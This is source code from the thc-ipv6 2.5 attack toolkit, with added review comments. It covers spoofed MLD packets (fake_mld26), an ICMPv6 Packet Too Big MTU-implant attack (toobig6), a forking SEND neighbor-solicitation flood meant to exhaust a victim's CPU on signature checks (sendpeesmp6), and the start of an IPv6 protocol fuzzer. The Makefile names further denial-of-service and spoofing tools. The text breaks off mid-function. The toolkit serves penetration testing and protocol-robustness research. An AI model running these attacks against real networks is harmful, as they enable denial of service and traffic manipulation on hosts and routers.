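  if (strncasecmp(argv[2], "del", 3) == 0) {
    mode = ICMP6_MLD2_REPORT;
    actionmode = 4;
  }
  if (strncasecmp(argv[2], "que", 3) == 0) {
    mode = ICMP6_MLD_QUERY;
    wait = 0x0444 << 16;        // passed as the flags argument of thc_add_icmp6() -- presumably the response-delay field; confirm
    buflen = 20;
  }
  if (mode == 0) {
    fprintf(stderr, "Error: no mode defined, specify add, delete or query\n");
    exit(-1);
  }
  if (argc == 3 || argv[3] == NULL || argv[3][0] == 0) {
    multicast6 = thc_resolve6("::");
    empty = 1;
  } else {
    if ((multicast6 = thc_resolve6(argv[3])) == NULL) {
      fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[3]);
      exit(-1);
    }
    // an all-zero address counts as "no address given".
    // NOTE(review): multicast6 is a plain char *, so where char is signed the
    // bytes are summed as signed values and a non-zero address can add up to 0
    for (j = 0; j < 16; j++)
      i += multicast6[j];
    if (i == 0)
      empty = 1;
  }
  // NOTE(review): dst6 and src6 are not checked for NULL before they are used below
  if (argv[4] != NULL && argc > 4)
    dst6 = thc_resolve6(argv[4]);
  else if (mode == ICMP6_MLD_QUERY) {
    // buf is still all zeroes here, so this asks "is multicast6 something other than ::"
    if (memcmp(multicast6, buf, 16))
      dst6 = multicast6;
    else
      dst6 = thc_resolve6("ff02::1");
  } else
    dst6 = thc_resolve6("ff02::16");
  if (argv[5] != NULL && argc > 5)
    ttl = atoi(argv[5]);
  if (argv[6] != NULL && argc > 6)
    src6 = thc_resolve6(argv[6]);
  else
    src6 = thc_get_own_ipv6(interface, dst6, PREFER_LINK);

  if (rawmode == 0) {
    // NOTE(review): every %x stores a whole unsigned int through a pointer
    // into a byte array.  The 16-byte arrays keep the stores in bounds, but
    // the return value of sscanf() is ignored and the result depends on the
    // host byte order
    if (argv[7] != NULL && argc > 7)
      sscanf(argv[7], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3], (unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]);
    else
      mac = thc_get_own_mac(interface);
    if (argv[8] != NULL && argc > 8)
      sscanf(argv[8], "%x:%x:%x:%x:%x:%x", (unsigned int *) &dstmac[0], (unsigned int *) &dstmac[1], (unsigned int *) &dstmac[2], (unsigned int *) &dstmac[3], (unsigned int *) &dstmac[4], (unsigned int *) &dstmac[5]);
    else
      dmac = NULL;
  }

  if ((p = thc_pcap_init_promisc(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, src6, dst6, ttl, 0, 0, 0, 0)) == NULL)
    return -1;
  // hop-by-hop payload: option type 5, length 2, value 0 -- the same option
  // byte check_packets() tests at ptr[42]
  memset(buf, 0, sizeof(buf));
  buf[0] = 5;
  buf[1] = 2;
  if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf, 6) < 0)
    return -1;
  memset(buf, 0, sizeof(buf));
  if (mode == ICMP6_MLD_QUERY) {
    // query body (buflen 20): the multicast address followed by two parameter bytes
    memcpy(buf, multicast6, 16);
    buf[16] = 7;
    buf[17] = 120;
  } else {
    // one report record (buflen 36): type, source count 1, multicast address, src6 as the single source
    buf[0] = actionmode;
    buf[3] = 1;
    memcpy(buf + 4, multicast6, 16);
    memcpy(buf + 20, src6, 16);
  }
  if (thc_add_icmp6(pkt1, &pkt1_len, mode, 0, wait, (unsigned char *) &buf, buflen, 0) < 0)
    return -1;

  if (thc_generate_pkt(interface, mac, dmac, pkt1, &pkt1_len) < 0) {
    fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
    exit(-1);
  }

  printf("Sending packet%s for %s%s\n", loop ? "s" : "", empty ? "::" : argv[3], loop ? 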
" (Press Control-C to end)" : "");
  // send once, or every 5 seconds while `loop` is set; in query mode drain
  // the capture queue through check_packets() after each send
  do {
    thc_send_pkt(interface, pkt1, &pkt1_len);
    sleep(5);
    if (mode == ICMP6_MLD_QUERY)
      while (thc_pcap_check(p, (char *) check_packets, NULL));
  } while (loop);
  return 0;                     // never reached
}
thc-ipv6-2.5/toobig6.c0000644000000000000000000000522512251022441013230 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

/* Print the usage text for toobig6 and terminate with exit status -1. */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s [-u] interface target-ip existing-ip mtu [hop-limit]\n\n", prg);
  printf("Implants the specified mtu on the target.\n");
  printf("If the TTL of the target is not 64, then specify this as the last option.\n");
  printf("Option -u will send the TooBig without the spoofed ping6 from existing-ip.\n");
  // printf("Use -r to use raw mode.\n\n");
  exit(-1);
}

/*
 * toobig6 entry point.
 *
 * Arguments: [-u] interface target-ip existing-ip mtu [hop-limit]
 *
 * Builds an ICMPv6 echo request from existing-ip to target-ip padded with
 * 'A' bytes, sends it unless -u was given, then inverts that packet with
 * thc_inverse_packet() and passes the result to thc_toobig6() together with
 * the requested mtu.
 *
 * Returns 0 after the packets were handed to the library, -1 when building
 * the echo request fails.
 */
int main(int argc, char *argv[]) {
  unsigned char *pkt = NULL, buf[65536];
  unsigned char *mac6 = NULL, *src6, *target6;
  int rmtu, buf_len = 0, ttl = 63, offset = 14;
  int pkt_len = 0;
  thc_ipv6_hdr *ipv6;
  char *interface;
  unsigned int mtu, related = 1;

  if (argc > 3 && strncmp(argv[1], "-u", 2) == 0) {
    related = 0;
    argc--;
    argv++;
  }

  if (argc < 5 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  interface = argv[1];
  // NOTE(review): neither thc_resolve6() result is checked for NULL
  target6 = thc_resolve6(argv[2]);
  src6 = thc_resolve6(argv[3]);
  // atoi() gives no error indication, and a negative value wraps to a large unsigned mtu
  mtu = atoi(argv[4]);
  rmtu = thc_get_mtu(interface);
  if (do_hdr_size)
    offset = do_hdr_size;

  if (rmtu < 1280 || rmtu > 65530) {
    fprintf(stderr, "Error: mtu size invalid on interface %s\n", interface);
    exit(-1);
  }

  // without a fifth argument ttl stays at its initialiser 63; an
  // out-of-range argument is replaced by 64
  if (argc > 5)
    ttl = atoi(argv[5]);
  if (ttl < 0 || ttl > 255)
    ttl = 64;

  mac6 = thc_get_own_mac(interface);
  // echo payload length derived from the requested mtu.  The last clamp caps
  // it at rmtu - 48, and rmtu <= 65530 was enforced above, so buf_len cannot
  // exceed sizeof(buf)
  if (mtu > 47)
    buf_len = mtu - 47;
  if (buf_len < 0)
    buf_len = rmtu - 48 - offset;
  if (rmtu - 48 < buf_len )
    buf_len = rmtu - 48;
  memset(buf, 'A', sizeof(buf));

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, target6, 0, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, buf_len, 0) < 0)
    return -1;
  if (thc_generate_pkt(interface, NULL, NULL, pkt, &pkt_len) < 0) {
    fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
    exit(-1);
  }
  if (related)
    if (thc_send_pkt(interface, pkt, &pkt_len) < 0) {
      fprintf(stderr, "Error: Can not send packet, exiting ...\n");
      exit(-1);
    }
  usleep(50000);
  ipv6 = (thc_ipv6_hdr *) pkt;
  // the request is inverted in place so it can be embedded in the Too Big message
  thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset);
  ipv6->pkt[offset + 7] = (unsigned char) ttl;   // byte 7 of the IPv6 header is the hop limit
  thc_toobig6(interface, src6, mac6, NULL, mtu, ipv6->pkt + offset, ipv6->pkt_len - offset);
  // NOTE(review): this prints argv[2] (target-ip) after "attack on" and
  // argv[3] (existing-ip) after "for target"; the return value of
  // thc_toobig6() is not checked before reporting success
  printf("toobig6 attack on %s for target %s and MTU %s sent.\n", argv[2], argv[3], argv[4]);

  return 0;
}
thc-ipv6-2.5/Makefile0000644000000000000000000000335012256337516013171 0ustar rootroot# Comment out if openssl-dev is not present HAVE_SSL=yes CC=gcc #CFLAGS=-g CFLAGS=-O2 CFLAGS+=$(if $(HAVE_SSL),-D_HAVE_SSL,) LDFLAGS+=-lpcap $(if $(HAVE_SSL),-lssl -lcrypto,) PROGRAMS=parasite6 dos-new-ip6 detect-new-ip6 fake_router6 fake_advertise6 fake_solicitate6 fake_mld6 fake_mld26 fake_mldrouter6 flood_mldrouter6 fake_mipv6 redir6 smurf6 alive6 toobig6 rsmurf6 implementation6 implementation6d sendpees6 sendpeesmp6 randicmp6 fuzz_ip6 flood_mld6 flood_mld26 flood_router6 flood_advertise6 flood_solicitate6 trace6 exploit6 denial6 fake_dhcps6 flood_dhcpc6 fake_dns6d fragmentation6 kill_router6 fake_dnsupdate6 ndpexhaust6 detect_sniffer6 dump_router6 fake_router26 flood_router26 passive_discovery6 dnsrevenum6 inverse_lookup6 node_query6 address6 covert_send6 covert_send6d inject_alive6 firewall6 ndpexhaust26 fake_pim6 thcsyn6 redirsniff6 flood_redir6 four2six dump_dhcp6 fuzz_dhcps6 flood_rs6 LIBS=thc-ipv6-lib.o STRIP=echo PREFIX=/usr/local MANPREFIX=${PREFIX}/share/man all: $(LIBS) $(PROGRAMS) dnssecwalk dnsdict6 thcping6 dnssecwalk: dnssecwalk.c $(CC) $(CFLAGS) -o $@ $^ dnsdict6: dnsdict6.c $(CC) $(CFLAGS) -o $@ $^ -lpthread -lresolv thcping6: thcping6.c $(LIBS) $(CC) $(CFLAGS) 
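-o $@ $^ $(LDFLAGS) -lrt %: %.c $(LIBS) $(CC) $(CFLAGS) -o $@ $^ $(LDFLAGS) strip: all $(STRIP) $(PROGRAMS) dnssecwalk dnsdict6 thcping6 install: all strip install -m0755 -d ${DESTDIR}${PREFIX}/bin install -m0755 $(PROGRAMS) dnsdict6 thcping6 dnssecwalk *.sh ${DESTDIR}${PREFIX}/bin install -m0755 -d ${DESTDIR}${MANPREFIX}/man8 install -m0644 -D thc-ipv6.8 ${DESTDIR}${MANPREFIX}/man8 clean: rm -f $(PROGRAMS) dnsdict6 thcping6 dnssecwalk $(LIBS) core DEADJOE *~ backup: clean tar czvf ../thc-ipv6-bak.tar.gz * sync .PHONY: all install clean thc-ipv6-2.5/sendpeesmp6.c0000644000000000000000000001272412251022441014112 0ustar rootroot#include #include #include #include
#ifndef _HAVE_SSL
/* Stub used when the suite is built without OpenSSL: report and fail. */
int main() {
  fprintf(stderr, "Error: thc-ipv6 was compiled without openssl support, sendpeesmp6 disabled.\n");
  return -1;
}
#else
#include #include
#include "thc-ipv6.h"
#include #include #include #include #include

#define HIGH 255
#define LOW 0
#define THREAD_NUM 150

/* data structure to hold data to pass to a thread (later converted to processes) */
struct thread_data {
  int thread_id;
  unsigned char *dev;
  unsigned char srchw[6];
  unsigned char dsthw[6];
  unsigned char *pkt;
  int pkt_len;
};

/* array of these thread data structs */
struct thread_data thread_data_array[THREAD_NUM];

/*
 * sendpeesmp6 entry point.
 *
 * Generates one key of the requested length and one CGA for the given
 * prefix, then forks THREAD_NUM children. Each child builds a neighbor
 * solicitation carrying SEND options, wraps it in an Ethernet frame whose
 * source MAC has three bytes read from /dev/urandom, and sends that same
 * frame `count` times.
 *
 * Arguments (argc must be 5): interface key_length prefix victim.
 * Returns 0 in the parent once one child has exited; setup errors end in
 * exit(). Children always leave through exit(1).
 *
 * NOTE(review): every frame makes a SEND-capable receiver verify a CGA and
 * an RSA signature, so the cost sits on the receiving side. Rate limiting
 * of signature verification on the receiver is the usual way to bound it -
 * confirm what the implementation under test offers.
 */
int main(int argc, char **argv) {
  thc_cga_hdr *cga_opt;         /* CGA header */
  thc_key_t *key;               /* public key */
  unsigned char *pkt = NULL;    /* generic packet space */
  unsigned char *dst6, *cga, *dev;      /* IPv6 addrs */

  /* various parts of packets, temporaries */
  char advdummy[16], soldummy[24], prefix[8], *addr;

  /* MAC addresses for testing, attacking */
//  unsigned char dsthw[] = "\xff\xff\xff\xff\xff\xff";
//  unsigned char tgthw[] = "\x00\x1a\xa0\x41\xf0\x2d"; /*real attack mac */
  unsigned char *tgthw;
//  unsigned char srchw[] = "\xdd\xde\xad\xbe\xef\xdd";
//  unsigned char srchwreal[] = "\x00\x11\x11\x32\xb2\x84";
//  unsigned char tag[] = "\xdd\xde\xad\xbe\xef\xdd\xdd\xde\xad\xbe\xef\xdd\xbe\xef\xaa\xaa";
  int pkt_len = 0;              /* packet length */
  int flags = 0;                /* ICMPv6 flags */
//  thc_ipv6_rawmode(0);        /* generate my own MAC addresses */
  int debug = 0;                /* debug switch */
  FILE *fp;                     /* file pointer for reading from /dev/urandom */
  unsigned char test[6];        /* randomized mac storage */
  int result = 0, pid, status, i;       /* exit codes */
  int count = 1000000000;       /* frames sent per child */

  if (argc != 5) {
    printf("original sendpees by willdamn \n");
    printf("modified sendpeesMP by Marcin Pohl \nCode based on thc-ipv6\n\n");
    printf("Syntax: %s interface key_length prefix victim\n\n", argv[0]);
    printf("Send SEND neighbor solicitation messages and make target to verify a lota CGA and RSA signatures\n");
    printf("Example: %s eth0 2048 fe80:: fe80::1\n\n", argv[0]);
    exit(1);
  }

  memset(&test, 0, 6);          /* set 6 bytes to zero */
  fp = fopen("/dev/urandom", "r");
  /* every child reads from fp; fail here instead of dereferencing NULL
     inside fread() after the fork */
  if (fp == NULL) {
    fprintf(stderr, "Error: could not open /dev/urandom\n");
    exit(-1);
  }
  dev = (unsigned char *) argv[1];      /* read interface from commandline */
  if ((addr = thc_resolve6(argv[3])) == NULL) {
    fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[3]);
    exit(-1);
  }

  if (thc_get_own_ipv6(dev, NULL, PREFER_LINK) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", dev);
    exit(-1);
  }

  memcpy(prefix, addr, 8);      /* first 8 bytes of sockaddr is prefix */
  /* key generation happens once, before the fork; atoi() does not reject
     a non-numeric key_length */
  key = thc_generate_key(atoi(argv[2]));        /* EXPENSIVE KEYGEN HERE! */
  if (key == NULL) {
    printf("Couldn't generate key!");
    exit(1);
  }

  /* makes options and the address */
  cga_opt = thc_generate_cga(prefix, key, &cga);
  /* cga = thc_resolve6("::"); */
  if (cga_opt == NULL) {
    printf("Error during CGA generation");
    exit(1);
  }

  /* ICMP6 TARGET, IPDST; argc == 5 means argv[4] is always set, the
     ff02::1 branch is kept from the original */
  if (argv[4] == NULL)
    dst6 = thc_resolve6("ff02::1");
  else
    dst6 = thc_resolve6(argv[4]);
  /* dst6 is copied with memcpy() below, so an unresolvable victim must
     stop the program here */
  if (dst6 == NULL) {
    fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[4]);
    exit(-1);
  }

  /* NOTE(review): the result is not checked before it is used as the
     destination MAC in thc_generate_pkt() */
  tgthw = thc_get_mac(dev, cga, dst6);

  test[0] = 0;                  /* set MAC to intel */
  test[1] = 170;                /* set MAC to intel */
  test[2] = 0;                  /* set MAC to intel */

  /* set ICMP OPTION SLLA HERE */
  memset(advdummy, 'D', sizeof(advdummy));
  memset(soldummy, 'D', sizeof(soldummy));

  /* set destination IP here */
  memcpy(advdummy, dst6, 16);   /* dstIP */
  memcpy(soldummy, dst6, 16);   /* dstIP */

  /* fixed values for NS */
  soldummy[16] = 1;
  soldummy[17] = 1;
  /* test[3..5] are still zero here; the per-child random bytes are read
     after this copy */
  memcpy(&soldummy[18], test, 6);       /* SLLA OPTION */

  /* ND flags */
  flags = ICMP6_NEIGHBORADV_OVERRIDE;

  /* the forking starts here */
  for (i = 0; i < THREAD_NUM; ++i) {
    pid = fork();
    if (pid == 0) {
      printf("Creating thread %d\n", i);

      /* randomize MAC here; a short read would leave part of the MAC
         at zero, so treat it as an error */
      result = fread((char *) &test[3], 1, 3, fp);
      if (result != 3) {
        fprintf(stderr, "Error: could not read from /dev/urandom\n");
        exit(1);
      }

      /* create IPv6 portion */
      if ((pkt = thc_create_ipv6_extended(dev, PREFER_LINK, &pkt_len, cga, dst6, 0, 0, 0, 0, 0)) == NULL) {
        printf("Cannot create IPv6 header\n");
        exit(1);
      }

      /* create ICMPv6 with SeND options */
      if (thc_add_send(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0x0, flags, soldummy, 24, cga_opt, key, NULL, 0) < 0) {
        printf("Cannot add SEND options\n");
        exit(1);
      }
      free(cga_opt);

      if (debug) {
        printf("%02x:%02x:%02x:%02x:%02x:%02x\n", test[0], test[1], test[2], test[3], test[4], test[5]);
//        printf("%02x:%02x:%02x:%02x:%02x:%02x\n", dsthw[0], dsthw[1], dsthw[2], dsthw[3], dsthw[4], dsthw[5]);
        fflush(stdout);
      }

      /* attach the IPv6+ICMPv6+SeND to an Ethernet frame with random MAC */
      if ((result = thc_generate_pkt(dev, test, tgthw, pkt, &pkt_len)) < 0) {
        fprintf(stderr, "Couldn't generate IPv6 packet, error num %d !\n", result);
        exit(1);
      }

      printf("Sending %d...", i);
      fflush(stdout);
      while (count) {
        /* send many packets */
        thc_send_pkt(dev, pkt, &pkt_len);
        --count;
      }
      exit(1);
    }
  }

  /* a single wait(): the parent returns as soon as one child has exited;
     a failed fork() (pid < 0) is not reported */
  wait(&status);
  return 0;
}
#endif
thc-ipv6-2.5/fuzz_ip6.c0000644000000000000000000007551412251022437013450 0ustar rootroot#include #include #include #include #include #include #include #include #include #include
#include "thc-ipv6.h"

/*
 * Fuzzing data types:
 *  F = flags = 1 byte = 8 bits | flags | 8 ; 256
 *  B = byte = 1 byte | 0 1 254 255 xor XOR | 6 ; 256
 *  X = byte = 1 byte | all values from 0 to 255
 *  W = word = 2 bytes | 0,1,254,255^2 xor XOR | 18 ; 65536
 *  D = double word = 4 bytes | {0,1,254,255}^4 xor XOR | 258 ; 4294967295
 *  . = byte = ignore, jump over
 *
 */

/* one template character per packet byte, appended to fuzzbuf in main() */
char fuzztype_ether[] = "..............";
char fuzztype_ip6[] = "XF..WXBXX..............XX..............";
char fuzztype_ip6no[] = "........................................";
char fuzztype_icmp6[] = "XX..";
char fuzztype_icmp6no[] = "....";
char fuzztype_icmp6ping[] = "";
char fuzztype_icmp6ra[] = "........XXWWWXXXX........XX.............XXXX....XXXXXBB..XX.............XXXBB....XX.............XXXBB....X...X....XX.....X......XXXXXXXXX";
char fuzztype_icmp6ns[] = "XX..XX............XXXX";
char fuzztype_icmp6na[] = "FFFFXX............XXXX";
char fuzztype_icmp6nq[] = "FXFX........XX............XX";
char fuzztype_icmp6mld[] = "WWXXXX............XX";
char fuzztype_icmp6mld2rep[] = "WFFXFFF................................................XFFF................................................XFFF................................................";
char fuzztype_icmp6mld2que[] = "WWXXXX............XXFWFF";
char fuzztype_tcp[] = "WWWWWWXXWWWXXWXXXXXXWWWWXX";

/* value tables walked for each template character; the trailing number is
   the element count mirrored by the COUNT_* macros */
unsigned char flags[] = { 0, 1, 2, 4, 8, 16, 32, 64, 128, 254, 255 }; // 11
unsigned char bytes[] = { 0, 1, 254, 255 }; // 4
unsigned short int words[] = { 0x0000, 0x0001, 0x00fe, 0x00ff, 0x0100, 0x0101, 0x01fe, 0x01ff, 0xfe00, 0xfe01, 0xfefe, 0xfeff, 0xff00, 0xff01, 0xfffe, 0xffff }; // 16
unsigned int xors[] = { 0, 0xffffffff }; // 2
unsigned char extends[] = { 0, 1, 2, 3, 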
4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255 }; // 256 unsigned int dwords[] = { 0x00000000, 0x00000001, 0x000000fe, 0x000000ff, 0x00000100, 0x00000101, 0x000001fe, 0x000001ff, 0x0000fe00, 0x0000fe01, 0x0000fefe, 0x0000feff, 0x0000ff00, 0x0000ff01, 0x0000fffe, 0x0000ffff, 0x00010000, 0x00010001, 0x000100fe, 0x000100ff, 0x00010100, 0x00010101, 0x000101fe, 0x000101ff, 0x0001fe00, 0x0001fe01, 0x0001fefe, 0x0001feff, 0x0001ff00, 0x0001ff01, 0x0001fffe, 0x0001ffff, 0x00fe0000, 0x00fe0001, 0x00fe00fe, 0x00fe00ff, 0x00fe0100, 0x00fe0101, 0x00fe01fe, 0x00fe01ff, 0x00fefe00, 0x00fefe01, 0x00fefefe, 0x00fefeff, 0x00feff00, 0x00feff01, 0x00fefffe, 0x00feffff, 0x00ff0000, 0x00ff0001, 0x00ff00fe, 0x00ff00ff, 0x00ff0100, 0x00ff0101, 0x00ff01fe, 0x00ff01ff, 0x00fffe00, 0x00fffe01, 0x00fffefe, 0x00fffeff, 0x00ffff00, 0x00ffff01, 0x00fffffe, 0x00ffffff, 0x01000000, 0x01000001, 0x010000fe, 
0x010000ff, 0x01000100, 0x01000101, 0x010001fe, 0x010001ff, 0x0100fe00, 0x0100fe01, 0x0100fefe, 0x0100feff, 0x0100ff00, 0x0100ff01, 0x0100fffe, 0x0100ffff, 0x01010000, 0x01010001, 0x010100fe, 0x010100ff, 0x01010100, 0x01010101, 0x010101fe, 0x010101ff, 0x0101fe00, 0x0101fe01, 0x0101fefe, 0x0101feff, 0x0101ff00, 0x0101ff01, 0x0101fffe, 0x0101ffff, 0x01fe0000, 0x01fe0001, 0x01fe00fe, 0x01fe00ff, 0x01fe0100, 0x01fe0101, 0x01fe01fe, 0x01fe01ff, 0x01fefe00, 0x01fefe01, 0x01fefefe, 0x01fefeff, 0x01feff00, 0x01feff01, 0x01fefffe, 0x01feffff, 0x01ff0000, 0x01ff0001, 0x01ff00fe, 0x01ff00ff, 0x01ff0100, 0x01ff0101, 0x01ff01fe, 0x01ff01ff, 0x01fffe00, 0x01fffe01, 0x01fffefe, 0x01fffeff, 0x01ffff00, 0x01ffff01, 0x01fffffe, 0x01ffffff, 0xfe000000, 0xfe000001, 0xfe0000fe, 0xfe0000ff, 0xfe000100, 0xfe000101, 0xfe0001fe, 0xfe0001ff, 0xfe00fe00, 0xfe00fe01, 0xfe00fefe, 0xfe00feff, 0xfe00ff00, 0xfe00ff01, 0xfe00fffe, 0xfe00ffff, 0xfe010000, 0xfe010001, 0xfe0100fe, 0xfe0100ff, 0xfe010100, 0xfe010101, 0xfe0101fe, 0xfe0101ff, 0xfe01fe00, 0xfe01fe01, 0xfe01fefe, 0xfe01feff, 0xfe01ff00, 0xfe01ff01, 0xfe01fffe, 0xfe01ffff, 0xfefe0000, 0xfefe0001, 0xfefe00fe, 0xfefe00ff, 0xfefe0100, 0xfefe0101, 0xfefe01fe, 0xfefe01ff, 0xfefefe00, 0xfefefe01, 0xfefefefe, 0xfefefeff, 0xfefeff00, 0xfefeff01, 0xfefefffe, 0xfefeffff, 0xfeff0000, 0xfeff0001, 0xfeff00fe, 0xfeff00ff, 0xfeff0100, 0xfeff0101, 0xfeff01fe, 0xfeff01ff, 0xfefffe00, 0xfefffe01, 0xfefffefe, 0xfefffeff, 0xfeffff00, 0xfeffff01, 0xfefffffe, 0xfeffffff, 0xff000000, 0xff000001, 0xff0000fe, 0xff0000ff, 0xff000100, 0xff000101, 0xff0001fe, 0xff0001ff, 0xff00fe00, 0xff00fe01, 0xff00fefe, 0xff00feff, 0xff00ff00, 0xff00ff01, 0xff00fffe, 0xff00ffff, 0xff010000, 0xff010001, 0xff0100fe, 0xff0100ff, 0xff010100, 0xff010101, 0xff0101fe, 0xff0101ff, 0xff01fe00, 0xff01fe01, 0xff01fefe, 0xff01feff, 0xff01ff00, 0xff01ff01, 0xff01fffe, 0xff01ffff, 0xfffe0000, 0xfffe0001, 0xfffe00fe, 0xfffe00ff, 0xfffe0100, 0xfffe0101, 0xfffe01fe, 0xfffe01ff, 0xfffefe00, 
0xfffefe01, 0xfffefefe, 0xfffefeff, 0xfffeff00, 0xfffeff01, 0xfffefffe, 0xfffeffff, 0xffff0000, 0xffff0001, 0xffff00fe, 0xffff00ff, 0xffff0100, 0xffff0101, 0xffff01fe, 0xffff01ff, 0xfffffe00, 0xfffffe01, 0xfffffefe, 0xfffffeff, 0xffffff00, 0xffffff01, 0xfffffffe, 0xffffffff }; // 256

/* element counts of the value tables defined above */
#define COUNT_FLAG 11
#define COUNT_BYTE 4
#define COUNT_WORD 16
#define COUNT_XOR 2
#define COUNT_EXTEND 256

/* NEVER is the default alive-check interval, TEST_MAX the default last test */
#define NEVER 2000000000
#define TEST_MAX (NEVER - 1)

/* packet kinds selected on the command line (stored in do_type) */
#define DO_NONE 0
#define DO_PING 1
#define DO_NEIGHSOL 2
#define DO_NEIGHADV 3
#define DO_RA 4
#define DO_NODEQUERY 5
#define DO_TCP 6
#define DO_MLD_REP 131
#define DO_MLD_DONE 132
#define DO_MLD_QUERY 130
#define DO_MLD2_QUERY 256
#define DO_MLD2_REPORT 143

/* TCP port set by -s; -1 until the option is parsed */
int port = -1;

/*
 * Show the fuzz_ip6 usage text and leave the program.
 *
 * prg: program name printed in the banner and the syntax line.
 * Does not return; the last statement is exit(-1).
 */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s [-x] [-t number | -T number] [-p number] [-IFSDHRJ] [-X|-1|-2|-3|-4|-5|-6|-7|-8|-9|-0 port] interface unicast-or-multicast-address [address-in-data-pkt]\n\n", prg);
  printf("Fuzzes an icmp6 packet\n");
  printf("Options:\n");

  /* packet type selection */
  printf(" -X do not add any ICMP/TCP header (transport layer)\n");
  printf(" -1 fuzz ICMP6 echo request (default)\n");
  printf(" -2 fuzz ICMP6 neighbor solicitation\n");
  printf(" -3 fuzz ICMP6 neighbor advertisement\n");
  printf(" -4 fuzz ICMP6 router advertisement\n");
  printf(" -5 fuzz multicast listener report packet\n");
  printf(" -6 fuzz multicast listener done packet\n");
  printf(" -7 fuzz multicast listener query packet\n");
  printf(" -8 fuzz multicast listener v2 report packet\n");
  printf(" -9 fuzz multicast listener v2 query packet\n");
  printf(" -0 fuzz node query packet\n");
  printf(" -s port fuzz TCP-SYN packet against port\n");

  /* test range and pacing */
  printf(" -x tries all 256 values for flag and byte types\n");
  printf(" -t number continue from test no. number\n");
  printf(" -T number only performs test no. number\n");
  printf(" -p number perform an alive check every number of tests (default: none)\n");
  printf(" -a do not perform initial and final alive test\n");
  printf(" -n number how many times to send each packet (default: 1)\n");

  /* additional headers */
  printf(" -I fuzz the IP header too\n");
  printf(" -F add one-shot fragmentation, and fuzz it too (for 1)\n");
  printf(" -S add source-routing, and fuzz it too (for 1)\n");
  printf(" -D add destination header, and fuzz it too (for 1)\n");
  printf(" -H add hop-by-hop header, and fuzz it too (for 1 and 5-9)\n");
  printf(" -R add router alert header, and fuzz it too (for 5-9 and all)\n");
  printf(" -J add jumbo packet header, and fuzz it too (for 1)\n");
//  printf("Use -r to use raw mode.\n");
  printf("You can only define one of -0 ... -9 and -s, defaults to -1.\n");
  printf("Returns -1 on error, 0 on tests done and targt alive or 1 on target crash.\n");
  exit(-1);
}

/*
 * Capture callback that discards the packet. check_alive() passes it to
 * thc_pcap_check() because only that call's return value is of interest.
 */
void ignoreit(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
}

/*
 * Probe the target and report whether anything came back.
 *
 * p:               capture handle that is polled through thc_pcap_check()
 * interface:       interface the probe is sent on
 * srcmac, dstmac:  link-layer addresses handed to thc_ping26()
 * src, dst:        IPv6 addresses handed to thc_ping26()
 *
 * Returns 1 when thc_pcap_check() reported a packet (presumably a count of
 * packets matching the capture filter - confirm in thc-ipv6-lib), 0 when
 * nothing was seen by the time time() has moved more than 4 seconds past
 * the first probe. The loop polls without sleeping.
 */
int check_alive(pcap_t * p, char *interface, unsigned char *srcmac, unsigned char *dstmac, unsigned char *src, unsigned char *dst) {
  /* -2: first probe outstanding, -1: second probe sent, 0: gave up, 1: packet seen */
  int state = -2;
  time_t started;

  /* drain whatever is already queued on the capture handle */
  while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0)
    ;

  thc_ping26(interface, srcmac, dstmac, src, dst, 16, 1);
  started = time(NULL);

  while (state < 0) {
    if (thc_pcap_check(p, (char *) ignoreit, NULL) > 0) {
      state = 1;
      continue;                 /* loop condition ends the wait */
    }
    /* one retry once the clock is more than a second past the first probe */
    if (state == -2 && time(NULL) > started + 1) {
